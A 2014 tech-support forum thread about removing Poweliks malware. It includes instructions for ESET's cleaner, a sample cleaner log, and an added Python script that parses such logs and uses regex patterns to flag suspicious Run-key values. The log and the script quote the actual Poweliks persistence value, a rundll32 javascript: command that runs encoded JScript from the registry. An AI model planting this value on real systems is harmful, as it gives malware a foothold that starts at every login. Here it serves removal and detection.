Rich-M Posted December 1, 2014

From Ken Dwight's Newsletter (the Virus Doctor): An update on a new category of virus called Poweliks. This has become one of the most widespread pieces of malware in the past two months, and removing it is significantly different from anything we have faced before. Here is my latest update on it: Click here: Here
starbuck Posted December 1, 2014

He seems a little behind the times with that.

"The first solution I distributed involved use of RogueKiller, from Adlice Software. That procedure was effective, if a bit involved. I've heard the Farbar Recovery Scan Tool is effective in finding and removing Poweliks infections. It is also the most confusing to use (for me, at least!)."

We've been using both of these for some time now. Problems reading and understanding the reports will always happen when you try to use tools that you are not familiar with (or trained in).

ESET offers a free Poweliks removal tool. If anyone wants instructions:

1. Please download Powelikscleaner (by ESET) and save it to your Desktop.
2. Double-click ESETPoweliksCleaner.exe to start the tool.
3. Read the terms of the End-user license agreement and click Agree if you agree to them.
4. The tool will run automatically.
5. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
6. If Poweliks was detected, "Win32/Poweliks was successfully removed from your system" will be displayed.
7. Press any key to exit the tool and reboot your PC.
8. The tool will produce a log in the same directory the tool was run from.
9. Please copy and paste the log in your next reply.

And the type of report you can expect:

[2014.11.04 19:38:24.612] - Begin
[2014.11.04 19:38:24.612] -
[2014.11.04 19:38:24.612] - ....................................
[2014.11.04 19:38:24.612] - ..::::::::::::::::::....................
[2014.11.04 19:38:24.612] - .::EEEEEE:::SSSSSS::..EEEEEE..TTTTTTTT.. Win32/Poweliks
[2014.11.04 19:38:24.628] - .::EE::::EE:SS:::::::.EE....EE....TT...... Version: 1.0.0.1
[2014.11.04 19:38:24.628] - .::EEEEEEEE::SSSSSS::.EEEEEEEE....TT...... Built: Oct 15 2014
[2014.11.04 19:38:24.628] - .::EE:::::::::::::SS:.EE..........TT......
[2014.11.04 19:38:24.628] - .::EEEEEE:::SSSSSS::..EEEEEE.....TT..... Copyright © ESET, spol. s r.o.
[2014.11.04 19:38:24.628] - ..::::::::::::::::::.................... 1992-2013. All rights reserved.
[2014.11.04 19:38:24.628] - ....................................
[2014.11.04 19:38:24.628] -
[2014.11.04 19:38:24.628] - --------------------------------------------------------------------------------
[2014.11.04 19:38:24.628] -
[2014.11.04 19:38:24.628] - INFO: OS: 6.1.7601 SP1
[2014.11.04 19:38:24.628] - INFO: Product Type: Workstation
[2014.11.04 19:38:24.628] - INFO: WoW64: False
[2014.11.04 19:38:24.628] - INFO: Machine guid: 5F2EDDFD-8FAD-42BF-B824-D1D940424289
[2014.11.04 19:38:24.628] -
[2014.11.04 19:38:24.628] - INFO: Scanning for system infection...
[2014.11.04 19:38:24.628] - --------------------------------------------------------------------------------
[2014.11.04 19:38:24.628] -
[2014.11.04 19:38:24.628] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.04 19:38:24.628] - WARNING: Found infected value [ a] = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")'
[2014.11.04 19:38:24.628] - WARNING: Found infected value [ a] = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")'
[2014.11.04 19:38:24.628] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.04 19:38:24.628] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.04 19:38:24.628] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.04 19:38:24.628] - INFO: Processing classes...
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{11CD84A3-A5E0-43CB-B3DF-92C623C0E0E0}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{22756E83-8EBC-4B16-A4A4-0AA73BE497B1}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{2A235D7E-0358-40E2-B51A-DE22F8F5C50D}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{56C94D6A-7370-4885-A04E-7097FE4E0BAF}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{672CDBDB-0270-4EB9-83EC-216377522D21}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{841BFDCA-6A9A-4EBC-BC7E-194AA5DCE428}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{94330D48-EB33-49BB-87F1-AD8C0352C010}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{BE13040F-26A4-4DC4-A537-5C8C1D76FEDD}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{F7CA46A9-ACA5-45A6-967E-03FF5A282D01}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{11CD84A3-A5E0-43CB-B3DF-92C623C0E0E0}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{22756E83-8EBC-4B16-A4A4-0AA73BE497B1}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{2A235D7E-0358-40E2-B51A-DE22F8F5C50D}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{56C94D6A-7370-4885-A04E-7097FE4E0BAF}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{672CDBDB-0270-4EB9-83EC-216377522D21}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{841BFDCA-6A9A-4EBC-BC7E-194AA5DCE428}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{94330D48-EB33-49BB-87F1-AD8C0352C010}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{BE13040F-26A4-4DC4-A537-5C8C1D76FEDD}]
[2014.11.04 19:38:24.628] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{F7CA46A9-ACA5-45A6-967E-03FF5A282D01}]
[2014.11.04 19:38:24.628] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.04 19:38:24.628] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:24.628] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:24.628] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.04 19:38:24.628] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:24.628] - INFO: Processing value [serverExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:24.628] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:24.628] - INFO: Processing value [serverExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:24.628] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.04 19:38:24.628] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]...
[2014.11.04 19:38:24.628] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.04 19:38:24.628] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.04 19:38:24.628] - INFO: Win32/Poweliks found
[2014.11.04 19:38:28.372] - INFO: process: dllhost.exe, pid 1020, parent 2340
[2014.11.04 19:38:28.372] - INFO: Terminated process pid = 1020
[2014.11.04 19:38:28.372] - INFO: process: dllhost.exe, pid 3588, parent 580
[2014.11.04 19:38:28.372] - INFO: process: dllhost.exe, pid 2128, parent 580
[2014.11.04 19:38:28.372] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.04 19:38:28.372] - INFO: Deleted infected value [ a] = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")'
[2014.11.04 19:38:28.372] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.04 19:38:28.388] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.04 19:38:28.388] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.04 19:38:28.388] - INFO: Processing classes...
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{11CD84A3-A5E0-43CB-B3DF-92C623C0E0E0}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{22756E83-8EBC-4B16-A4A4-0AA73BE497B1}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{2A235D7E-0358-40E2-B51A-DE22F8F5C50D}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{56C94D6A-7370-4885-A04E-7097FE4E0BAF}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{672CDBDB-0270-4EB9-83EC-216377522D21}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{841BFDCA-6A9A-4EBC-BC7E-194AA5DCE428}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{94330D48-EB33-49BB-87F1-AD8C0352C010}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{BE13040F-26A4-4DC4-A537-5C8C1D76FEDD}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{F7CA46A9-ACA5-45A6-967E-03FF5A282D01}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{11CD84A3-A5E0-43CB-B3DF-92C623C0E0E0}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{22756E83-8EBC-4B16-A4A4-0AA73BE497B1}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{2A235D7E-0358-40E2-B51A-DE22F8F5C50D}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{56C94D6A-7370-4885-A04E-7097FE4E0BAF}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{672CDBDB-0270-4EB9-83EC-216377522D21}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{841BFDCA-6A9A-4EBC-BC7E-194AA5DCE428}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{94330D48-EB33-49BB-87F1-AD8C0352C010}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{BE13040F-26A4-4DC4-A537-5C8C1D76FEDD}]
[2014.11.04 19:38:28.388] - INFO: Processing clsid [\Registry\User\S-1-5-21-2119087973-2260802398-3012002660-1000\SOFTWARE\Classes\CLSID\{F7CA46A9-ACA5-45A6-967E-03FF5A282D01}]
[2014.11.04 19:38:28.388] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.04 19:38:28.388] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:28.388] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:28.388] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.04 19:38:28.388] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:28.388] - INFO: Processing value [serverExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:28.388] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:28.388] - INFO: Processing value [serverExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.04 19:38:28.388] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.04 19:38:28.388] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]...
[2014.11.04 19:38:28.388] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.04 19:38:28.388] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.04 19:38:28.388] - INFO: Cleaning status: 0
[2014.11.04 19:38:30.837] - End
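Added example, not from this thread or from ESET's tool: a small Python parser that pulls the "Found infected value" / "Deleted infected value" entries, the detection flag and the final cleaning status out of a cleaner log in the format above, plus a check that flags a Run-key value carrying the traits of that rundll32 javascript: persistence entry (for instance in an autoruns export reviewed before the cleaner is run). The log text is a constructed excerpt in the same format; the trait list and two-trait threshold are this example's own assumptions.

```python
import re

# Constructed excerpt in the format of the ESET Poweliks cleaner log above (not a real capture).
SAMPLE_LOG = r"""
[2014.11.04 19:38:24.628] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.04 19:38:24.628] - WARNING: Found infected value [ a] = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")'
[2014.11.04 19:38:24.628] - INFO: Win32/Poweliks found
[2014.11.04 19:38:28.372] - INFO: Deleted infected value [ a] = 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")'
[2014.11.04 19:38:28.388] - INFO: Cleaning status: 0
"""

# Traits of the value the cleaner flags: rundll32 given a javascript: argument, mshtml's
# RunHTMLApplication export, encoded JScript, and a WScript.Shell read-back of the registry.
# The list and the "at least two traits" rule are assumptions of this example.
TRAITS = [
    re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I),
    re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I),
    re.compile(r"jscript\.encode", re.I),
    re.compile(r"WScript\.Shell.*?RegRead", re.I),
]
LOG_LINE = re.compile(r"^\[(?P<ts>[^\]]+)\] - (?P<level>INFO|WARNING): (?P<msg>.*)$")
INFECTED = re.compile(r"^(?P<action>Found|Deleted) infected value \[(?P<name>[^\]]*)\] = '(?P<data>.*)'$")


def is_poweliks_style(value_data):
    """Flag a Run-key value showing at least two traits; one alone (e.g. rundll32) is too common."""
    return sum(1 for pattern in TRAITS if pattern.search(value_data)) >= 2


def scan_run_values(values):
    """Return the names of Run-key values (mapping name -> data) that look like the flagged entry."""
    return sorted(name for name, data in values.items() if is_poweliks_style(data))


def parse_eset_log(text):
    """Summarise a cleaner log: values found and deleted, detection flag, final cleaning status."""
    result = {"found": [], "deleted": [], "poweliks_found": False, "cleaning_status": None}
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # banner, separator and blank entries carry no INFO/WARNING payload
        msg = m.group("msg")
        v = INFECTED.match(msg)
        if v:
            key = "found" if v.group("action") == "Found" else "deleted"
            result[key].append((v.group("name").strip(), v.group("data")))
        elif msg == "Win32/Poweliks found":
            result["poweliks_found"] = True
        elif msg.startswith("Cleaning status: "):
            result["cleaning_status"] = int(msg.split(": ", 1)[1])
    return result


if __name__ == "__main__":
    summary = parse_eset_log(SAMPLE_LOG)
    print(summary["poweliks_found"], summary["cleaning_status"], scan_run_values(dict(summary["found"])))
```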
Rich-M (Author) Posted December 1, 2014

I honestly cannot figure out Farbar either, though RogueKiller I use all the time....
starbuck Posted December 2, 2014

"I honestly cannot figure out Farbar either"

Mmm, so while you can't understand it.... I get to keep my job.

To be fair, FRST has been around for 4 years now and obviously I have followed the development. It's easier to understand when you follow something from the beginning.... all the changes are gradual. Coming in now and trying to follow the tutorial is a bit heavy going.
Rich-M (Author) Posted December 2, 2014

Yep Pete, your job is definitely safe with me!
IceMan37 Posted January 4, 2015

Just ran the Poweliks tool, no threat found.
Rich-M (Author) Posted January 4, 2015

I run that on every system I look at and never find anything there.
starbuck Posted January 4, 2015

In the last 3 months or so, I've only ever come across this infection once.

"This has become one of the most widespread pieces of malware in the past two months"

I think that quote is a bit of an overstatement.
Rich-M (Author) Posted January 4, 2015

I'll say. I should check the date on that newsletter as I am not sure it was current. He may have been forwarding some to me to catch up, now that I think about it.